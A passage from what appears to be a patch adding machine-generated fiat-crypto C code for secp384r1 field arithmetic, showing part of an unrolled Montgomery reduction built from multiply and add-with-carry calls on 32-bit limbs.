++ fiat_secp384r1_mulx_u32(&x134, &x135, x104, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x136, &x137, x104, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x138, &x139, x104, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x140, &x141, x104, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x142, &x143, x104, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x144, &x145, x104, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x146, &x147, x104, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x148, &x149, 0x0, x145, x142); ++ fiat_secp384r1_addcarryx_u32(&x150, &x151, x149, x143, x140); ++ fiat_secp384r1_addcarryx_u32(&x152, &x153, x151, x141, x138); ++ fiat_secp384r1_addcarryx_u32(&x154, &x155, x153, x139, x136); ++ fiat_secp384r1_addcarryx_u32(&x156, &x157, x155, x137, x134); ++ fiat_secp384r1_addcarryx_u32(&x158, &x159, x157, x135, x132); ++ fiat_secp384r1_addcarryx_u32(&x160, &x161, x159, x133, x130); ++ fiat_secp384r1_addcarryx_u32(&x162, &x163, x161, x131, x128); ++ fiat_secp384r1_addcarryx_u32(&x164, &x165, 0x0, x104, x146); ++ fiat_secp384r1_addcarryx_u32(&x166, &x167, x165, x106, x147); ++ fiat_secp384r1_addcarryx_u32(&x168, &x169, x167, x108, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x170, &x171, x169, x110, x144); ++ fiat_secp384r1_addcarryx_u32(&x172, &x173, x171, x112, x148); ++ fiat_secp384r1_addcarryx_u32(&x174, &x175, x173, x114, x150); ++ fiat_secp384r1_addcarryx_u32(&x176, &x177, x175, x116, x152); ++ fiat_secp384r1_addcarryx_u32(&x178, &x179, x177, x118, x154); ++ fiat_secp384r1_addcarryx_u32(&x180, &x181, x179, x120, x156); ++ fiat_secp384r1_addcarryx_u32(&x182, &x183, x181, x122, x158); ++ fiat_secp384r1_addcarryx_u32(&x184, &x185, x183, x124, x160); ++ fiat_secp384r1_addcarryx_u32(&x186, &x187, x185, x126, x162); ++ fiat_secp384r1_addcarryx_u32(&x188, &x189, x187, ((uint32_t)x127 + x103), ++ (x163 + x129)); ++ fiat_secp384r1_addcarryx_u32(&x190, &x191, 0x0, x166, (arg1[3])); ++ fiat_secp384r1_addcarryx_u32(&x192, &x193, x191, x168, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x194, &x195, x193, x170, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x196, &x197, x195, x172, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x198, &x199, x197, x174, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x200, &x201, x199, x176, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x202, &x203, x201, x178, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x204, &x205, x203, x180, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x206, &x207, x205, x182, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x208, &x209, x207, x184, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x210, &x211, x209, x186, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x212, &x213, x211, x188, 0x0); ++ fiat_secp384r1_mulx_u32(&x214, &x215, x190, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x216, &x217, x190, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x218, &x219, x190, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x220, &x221, x190, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x222, &x223, x190, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x224, &x225, x190, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x226, &x227, x190, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x228, &x229, x190, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x230, &x231, x190, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x232, &x233, x190, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x234, &x235, 0x0, x231, x228); ++ fiat_secp384r1_addcarryx_u32(&x236, &x237, x235, x229, x226); ++ fiat_secp384r1_addcarryx_u32(&x238, &x239, x237, x227, x224); ++ fiat_secp384r1_addcarryx_u32(&x240, &x241, x239, x225, x222); ++ fiat_secp384r1_addcarryx_u32(&x242, &x243, x241, x223, x220); ++ fiat_secp384r1_addcarryx_u32(&x244, &x245, x243, x221, x218); ++ fiat_secp384r1_addcarryx_u32(&x246, &x247, x245, x219, x216); ++ fiat_secp384r1_addcarryx_u32(&x248, &x249, x247, x217, x214); ++ fiat_secp384r1_addcarryx_u32(&x250, &x251, 0x0, x190, x232); ++ fiat_secp384r1_addcarryx_u32(&x252, &x253, x251, x192, x233); ++ fiat_secp384r1_addcarryx_u32(&x254, &x255, x253, x194, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x256, &x257, x255, x196, x230); ++ fiat_secp384r1_addcarryx_u32(&x258, &x259, x257, x198, x234); ++ fiat_secp384r1_addcarryx_u32(&x260, &x261, x259, x200, x236); ++ fiat_secp384r1_addcarryx_u32(&x262, &x263, x261, x202, x238); ++ fiat_secp384r1_addcarryx_u32(&x264, &x265, x263, x204, x240); ++ fiat_secp384r1_addcarryx_u32(&x266, &x267, x265, x206, x242); ++ fiat_secp384r1_addcarryx_u32(&x268, &x269, x267, x208, x244); ++ fiat_secp384r1_addcarryx_u32(&x270, &x271, x269, x210, x246); ++ fiat_secp384r1_addcarryx_u32(&x272, &x273, x271, x212, x248); ++ fiat_secp384r1_addcarryx_u32(&x274, &x275, x273, ((uint32_t)x213 + x189), ++ (x249 + x215)); ++ fiat_secp384r1_addcarryx_u32(&x276, &x277, 0x0, x252, (arg1[4])); ++ fiat_secp384r1_addcarryx_u32(&x278, &x279, x277, x254, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x280, &x281, x279, x256, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x282, &x283, x281, x258, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x284, &x285, x283, x260, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x286, &x287, x285, x262, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x288, &x289, x287, x264, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x290, &x291, x289, x266, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x292, &x293, x291, x268, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x294, &x295, x293, x270, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x296, &x297, x295, x272, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x298, &x299, x297, x274, 0x0); ++ fiat_secp384r1_mulx_u32(&x300, &x301, x276, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x302, &x303, x276, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x304, &x305, x276, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x306, &x307, x276, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x308, &x309, x276, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x310, &x311, x276, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x312, &x313, x276, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x314, &x315, x276, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x316, &x317, x276, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x318, &x319, x276, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x320, &x321, 0x0, x317, x314); ++ fiat_secp384r1_addcarryx_u32(&x322, &x323, x321, x315, x312); ++ fiat_secp384r1_addcarryx_u32(&x324, &x325, x323, x313, x310); ++ fiat_secp384r1_addcarryx_u32(&x326, &x327, x325, x311, x308); ++ fiat_secp384r1_addcarryx_u32(&x328, &x329, x327, x309, x306); ++ fiat_secp384r1_addcarryx_u32(&x330, &x331, x329, x307, x304); ++ fiat_secp384r1_addcarryx_u32(&x332, &x333, x331, x305, x302); ++ fiat_secp384r1_addcarryx_u32(&x334, &x335, x333, x303, x300); ++ fiat_secp384r1_addcarryx_u32(&x336, &x337, 0x0, x276, x318); ++ fiat_secp384r1_addcarryx_u32(&x338, &x339, x337, x278, x319); ++ fiat_secp384r1_addcarryx_u32(&x340, &x341, x339, x280, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x342, &x343, x341, x282, x316); ++ fiat_secp384r1_addcarryx_u32(&x344, &x345, x343, x284, x320); ++ fiat_secp384r1_addcarryx_u32(&x346, &x347, x345, x286, x322); ++ fiat_secp384r1_addcarryx_u32(&x348, &x349, x347, x288, x324); ++ fiat_secp384r1_addcarryx_u32(&x350, &x351, x349, x290, x326); ++ fiat_secp384r1_addcarryx_u32(&x352, &x353, x351, x292, x328); ++ fiat_secp384r1_addcarryx_u32(&x354, &x355, x353, x294, x330); ++ fiat_secp384r1_addcarryx_u32(&x356, &x357, x355, x296, x332); ++ fiat_secp384r1_addcarryx_u32(&x358, &x359, x357, x298, x334); ++ fiat_secp384r1_addcarryx_u32(&x360, &x361, x359, ((uint32_t)x299 + x275), ++ (x335 + x301)); ++ fiat_secp384r1_addcarryx_u32(&x362, &x363, 0x0, x338, (arg1[5])); ++ fiat_secp384r1_addcarryx_u32(&x364, &x365, x363, x340, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x366, &x367, x365, x342, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x368, &x369, x367, x344, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x370, &x371, x369, x346, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x372, &x373, x371, x348, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x374, &x375, x373, x350, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x376, &x377, x375, x352, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x378, &x379, x377, x354, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x380, &x381, x379, x356, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x382, &x383, x381, x358, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x384, &x385, x383, x360, 0x0); ++ fiat_secp384r1_mulx_u32(&x386, &x387, x362, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x388, &x389, x362, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x390, &x391, x362, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x392, &x393, x362, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x394, &x395, x362, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x396, &x397, x362, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x398, &x399, x362, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x400, &x401, x362, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x402, &x403, x362, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x404, &x405, x362, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x406, &x407, 0x0, x403, x400); ++ fiat_secp384r1_addcarryx_u32(&x408, &x409, x407, x401, x398); ++ fiat_secp384r1_addcarryx_u32(&x410, &x411, x409, x399, x396); ++ fiat_secp384r1_addcarryx_u32(&x412, &x413, x411, x397, x394); ++ fiat_secp384r1_addcarryx_u32(&x414, &x415, x413, x395, x392); ++ fiat_secp384r1_addcarryx_u32(&x416, &x417, x415, x393, x390); ++ fiat_secp384r1_addcarryx_u32(&x418, &x419, x417, x391, x388); ++ fiat_secp384r1_addcarryx_u32(&x420, &x421, x419, x389, x386); ++ fiat_secp384r1_addcarryx_u32(&x422, &x423, 0x0, x362, x404); ++ fiat_secp384r1_addcarryx_u32(&x424, &x425, x423, x364, x405); ++ fiat_secp384r1_addcarryx_u32(&x426, &x427, x425, x366, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x428, &x429, x427, x368, x402); ++ fiat_secp384r1_addcarryx_u32(&x430, &x431, x429, x370, x406); ++ fiat_secp384r1_addcarryx_u32(&x432, &x433, x431, x372, x408); ++ fiat_secp384r1_addcarryx_u32(&x434, &x435, x433, x374, x410); ++ fiat_secp384r1_addcarryx_u32(&x436, &x437, x435, x376, x412); ++ fiat_secp384r1_addcarryx_u32(&x438, &x439, x437, x378, x414); ++ fiat_secp384r1_addcarryx_u32(&x440, &x441, x439, x380, x416); ++ fiat_secp384r1_addcarryx_u32(&x442, &x443, x441, x382, x418); ++ fiat_secp384r1_addcarryx_u32(&x444, &x445, x443, x384, x420); ++ fiat_secp384r1_addcarryx_u32(&x446, &x447, x445, ((uint32_t)x385 + x361), ++ (x421 + x387)); ++ fiat_secp384r1_addcarryx_u32(&x448, &x449, 0x0, x424, (arg1[6])); ++ fiat_secp384r1_addcarryx_u32(&x450, &x451, x449, x426, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x452, &x453, x451, x428, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x454, &x455, x453, x430, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x456, &x457, x455, x432, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x458, &x459, x457, x434, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x460, &x461, x459, x436, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x462, &x463, x461, x438, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x464, &x465, x463, x440, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x466, &x467, x465, x442, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x468, &x469, x467, x444, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x470, &x471, x469, x446, 0x0); ++ fiat_secp384r1_mulx_u32(&x472, &x473, x448, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x474, &x475, x448, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x476, &x477, x448, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x478, &x479, x448, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x480, &x481, x448, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x482, &x483, x448, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x484, &x485, x448, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x486, &x487, x448, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x488, &x489, x448, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x490, &x491, x448, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x492, &x493, 0x0, x489, x486); ++ fiat_secp384r1_addcarryx_u32(&x494, &x495, x493, x487, x484); ++ fiat_secp384r1_addcarryx_u32(&x496, &x497, x495, x485, x482); ++ fiat_secp384r1_addcarryx_u32(&x498, &x499, x497, x483, x480); ++ fiat_secp384r1_addcarryx_u32(&x500, &x501, x499, x481, x478); ++ fiat_secp384r1_addcarryx_u32(&x502, &x503, x501, x479, x476); ++ fiat_secp384r1_addcarryx_u32(&x504, &x505, x503, x477, x474); ++ fiat_secp384r1_addcarryx_u32(&x506, &x507, x505, x475, x472); ++ fiat_secp384r1_addcarryx_u32(&x508, &x509, 0x0, x448, x490); ++ fiat_secp384r1_addcarryx_u32(&x510, &x511, x509, x450, x491); ++ fiat_secp384r1_addcarryx_u32(&x512, &x513, x511, x452, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x514, &x515, x513, x454, x488); ++ fiat_secp384r1_addcarryx_u32(&x516, &x517, x515, x456, x492); ++ fiat_secp384r1_addcarryx_u32(&x518, &x519, x517, x458, x494); ++ fiat_secp384r1_addcarryx_u32(&x520, &x521, x519, x460, x496); ++ fiat_secp384r1_addcarryx_u32(&x522, &x523, x521, x462, x498); ++ fiat_secp384r1_addcarryx_u32(&x524, &x525, x523, x464, x500); ++ fiat_secp384r1_addcarryx_u32(&x526, &x527, x525, x466, x502); ++ fiat_secp384r1_addcarryx_u32(&x528, &x529, x527, x468, x504); ++ fiat_secp384r1_addcarryx_u32(&x530, &x531, x529, x470, x506); ++ fiat_secp384r1_addcarryx_u32(&x532, &x533, x531, ((uint32_t)x471 + x447), ++ (x507 + x473)); ++ fiat_secp384r1_addcarryx_u32(&x534, &x535, 0x0, x510, (arg1[7])); ++ fiat_secp384r1_addcarryx_u32(&x536, &x537, x535, x512, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x538, &x539, x537, x514, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x540, &x541, x539, x516, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x542, &x543, x541, x518, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x544, &x545, x543, x520, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x546, &x547, x545, x522, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x548, &x549, x547, x524, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x550, &x551, x549, x526, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x552, &x553, x551, x528, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x554, &x555, x553, x530, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x556, &x557, x555, x532, 0x0); ++ fiat_secp384r1_mulx_u32(&x558, &x559, x534, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x560, &x561, x534, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x562, &x563, x534, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x564, &x565, x534, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x566, &x567, x534, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x568, &x569, x534, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x570, &x571, x534, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x572, &x573, x534, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x574, &x575, x534, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x576, &x577, x534, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x578, &x579, 0x0, x575, x572); ++ fiat_secp384r1_addcarryx_u32(&x580, &x581, x579, x573, x570); ++ fiat_secp384r1_addcarryx_u32(&x582, &x583, x581, x571, x568); ++ fiat_secp384r1_addcarryx_u32(&x584, &x585, x583, x569, x566); ++ fiat_secp384r1_addcarryx_u32(&x586, &x587, x585, x567, x564); ++ fiat_secp384r1_addcarryx_u32(&x588, &x589, x587, x565, x562); ++ fiat_secp384r1_addcarryx_u32(&x590, &x591, x589, x563, x560); ++ fiat_secp384r1_addcarryx_u32(&x592, &x593, x591, x561, x558); ++ fiat_secp384r1_addcarryx_u32(&x594, &x595, 0x0, x534, x576); ++ fiat_secp384r1_addcarryx_u32(&x596, &x597, x595, x536, x577); ++ fiat_secp384r1_addcarryx_u32(&x598, &x599, x597, x538, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x600, &x601, x599, x540, x574); ++ fiat_secp384r1_addcarryx_u32(&x602, &x603, x601, x542, x578); ++ fiat_secp384r1_addcarryx_u32(&x604, &x605, x603, x544, x580); ++ fiat_secp384r1_addcarryx_u32(&x606, &x607, x605, x546, x582); ++ fiat_secp384r1_addcarryx_u32(&x608, &x609, x607, x548, x584); ++ fiat_secp384r1_addcarryx_u32(&x610, &x611, x609, x550, x586); ++ fiat_secp384r1_addcarryx_u32(&x612, &x613, x611, x552, x588); ++ fiat_secp384r1_addcarryx_u32(&x614, &x615, x613, x554, x590); ++ fiat_secp384r1_addcarryx_u32(&x616, &x617, x615, x556, x592); ++ fiat_secp384r1_addcarryx_u32(&x618, &x619, x617, ((uint32_t)x557 + x533), ++ (x593 + x559)); ++ fiat_secp384r1_addcarryx_u32(&x620, &x621, 0x0, x596, (arg1[8])); ++ fiat_secp384r1_addcarryx_u32(&x622, &x623, x621, x598, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x624, &x625, x623, x600, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x626, &x627, x625, x602, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x628, &x629, x627, x604, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x630, &x631, x629, x606, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x632, &x633, x631, x608, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x634, &x635, x633, x610, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x636, &x637, x635, x612, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x638, &x639, x637, x614, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x640, &x641, x639, x616, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x642, &x643, x641, x618, 0x0); ++ fiat_secp384r1_mulx_u32(&x644, &x645, x620, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x646, &x647, x620, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x648, &x649, x620, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x650, &x651, x620, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x652, &x653, x620, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x654, &x655, x620, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x656, &x657, x620, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x658, &x659, x620, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x660, &x661, x620, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x662, &x663, x620, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x664, &x665, 0x0, x661, x658); ++ fiat_secp384r1_addcarryx_u32(&x666, &x667, x665, x659, x656); ++ fiat_secp384r1_addcarryx_u32(&x668, &x669, x667, x657, x654); ++ fiat_secp384r1_addcarryx_u32(&x670, &x671, x669, x655, x652); ++ fiat_secp384r1_addcarryx_u32(&x672, &x673, x671, x653, x650); ++ fiat_secp384r1_addcarryx_u32(&x674, &x675, x673, x651, x648); ++ fiat_secp384r1_addcarryx_u32(&x676, &x677, x675, x649, x646); ++ fiat_secp384r1_addcarryx_u32(&x678, &x679, x677, x647, x644); ++ fiat_secp384r1_addcarryx_u32(&x680, &x681, 0x0, x620, x662); ++ fiat_secp384r1_addcarryx_u32(&x682, &x683, x681, x622, x663); ++ fiat_secp384r1_addcarryx_u32(&x684, &x685, x683, x624, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x686, &x687, x685, x626, x660); ++ fiat_secp384r1_addcarryx_u32(&x688, &x689, x687, x628, x664); ++ fiat_secp384r1_addcarryx_u32(&x690, &x691, x689, x630, x666); ++ fiat_secp384r1_addcarryx_u32(&x692, &x693, x691, x632, x668); ++ fiat_secp384r1_addcarryx_u32(&x694, &x695, x693, x634, x670); ++ fiat_secp384r1_addcarryx_u32(&x696, &x697, x695, x636, x672); ++ fiat_secp384r1_addcarryx_u32(&x698, &x699, x697, x638, x674); ++ fiat_secp384r1_addcarryx_u32(&x700, &x701, x699, x640, x676); ++ fiat_secp384r1_addcarryx_u32(&x702, &x703, x701, x642, x678); ++ fiat_secp384r1_addcarryx_u32(&x704, &x705, x703, ((uint32_t)x643 + x619), ++ (x679 + x645)); ++ fiat_secp384r1_addcarryx_u32(&x706, &x707, 0x0, x682, (arg1[9])); ++ fiat_secp384r1_addcarryx_u32(&x708, &x709, x707, x684, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x710, &x711, x709, x686, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x712, &x713, x711, x688, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x714, &x715, x713, x690, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x716, &x717, x715, x692, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x718, &x719, x717, x694, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x720, &x721, x719, x696, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x722, &x723, x721, x698, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x724, &x725, x723, x700, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x726, &x727, x725, x702, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x728, &x729, x727, x704, 0x0); ++ fiat_secp384r1_mulx_u32(&x730, &x731, x706, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x732, &x733, x706, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x734, &x735, x706, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x736, &x737, x706, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x738, &x739, x706, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x740, &x741, x706, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x742, &x743, x706, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x744, &x745, x706, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x746, &x747, x706, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x748, &x749, x706, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x750, &x751, 0x0, x747, x744); ++ fiat_secp384r1_addcarryx_u32(&x752, &x753, x751, x745, x742); ++ fiat_secp384r1_addcarryx_u32(&x754, &x755, x753, x743, x740); ++ fiat_secp384r1_addcarryx_u32(&x756, &x757, x755, x741, x738); ++ fiat_secp384r1_addcarryx_u32(&x758, &x759, x757, x739, x736); ++ fiat_secp384r1_addcarryx_u32(&x760, &x761, x759, x737, x734); ++ fiat_secp384r1_addcarryx_u32(&x762, &x763, x761, x735, x732); ++ fiat_secp384r1_addcarryx_u32(&x764, &x765, x763, x733, x730); ++ fiat_secp384r1_addcarryx_u32(&x766, &x767, 0x0, x706, x748); ++ fiat_secp384r1_addcarryx_u32(&x768, &x769, x767, x708, x749); ++ fiat_secp384r1_addcarryx_u32(&x770, &x771, x769, x710, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x772, &x773, x771, x712, x746); ++ fiat_secp384r1_addcarryx_u32(&x774, &x775, x773, x714, x750); ++ fiat_secp384r1_addcarryx_u32(&x776, &x777, x775, x716, x752); ++ fiat_secp384r1_addcarryx_u32(&x778, &x779, x777, x718, x754); ++ fiat_secp384r1_addcarryx_u32(&x780, &x781, x779, x720, x756); ++ fiat_secp384r1_addcarryx_u32(&x782, &x783, x781, x722, x758); ++ fiat_secp384r1_addcarryx_u32(&x784, &x785, x783, x724, x760); ++ fiat_secp384r1_addcarryx_u32(&x786, &x787, x785, x726, x762); ++ fiat_secp384r1_addcarryx_u32(&x788, &x789, x787, x728, x764); ++ fiat_secp384r1_addcarryx_u32(&x790, &x791, x789, ((uint32_t)x729 + x705), ++ (x765 + x731)); ++ fiat_secp384r1_addcarryx_u32(&x792, &x793, 0x0, x768, (arg1[10])); ++ fiat_secp384r1_addcarryx_u32(&x794, &x795, x793, x770, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x796, &x797, x795, x772, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x798, &x799, x797, x774, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x800, &x801, x799, x776, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x802, &x803, x801, x778, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x804, &x805, x803, x780, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x806, &x807, x805, x782, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x808, &x809, x807, x784, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x810, &x811, x809, x786, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x812, &x813, x811, x788, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x814, &x815, x813, x790, 0x0); ++ fiat_secp384r1_mulx_u32(&x816, &x817, x792, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x818, &x819, x792, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x820, &x821, x792, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x822, &x823, x792, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x824, &x825, x792, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x826, &x827, x792, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x828, &x829, x792, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x830, &x831, x792, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x832, &x833, x792, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x834, &x835, x792, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x836, &x837, 0x0, x833, x830); ++ fiat_secp384r1_addcarryx_u32(&x838, &x839, x837, x831, x828); ++ fiat_secp384r1_addcarryx_u32(&x840, &x841, x839, x829, x826); ++ fiat_secp384r1_addcarryx_u32(&x842, &x843, x841, x827, x824); ++ fiat_secp384r1_addcarryx_u32(&x844, &x845, x843, x825, x822); ++ fiat_secp384r1_addcarryx_u32(&x846, &x847, x845, x823, x820); ++ 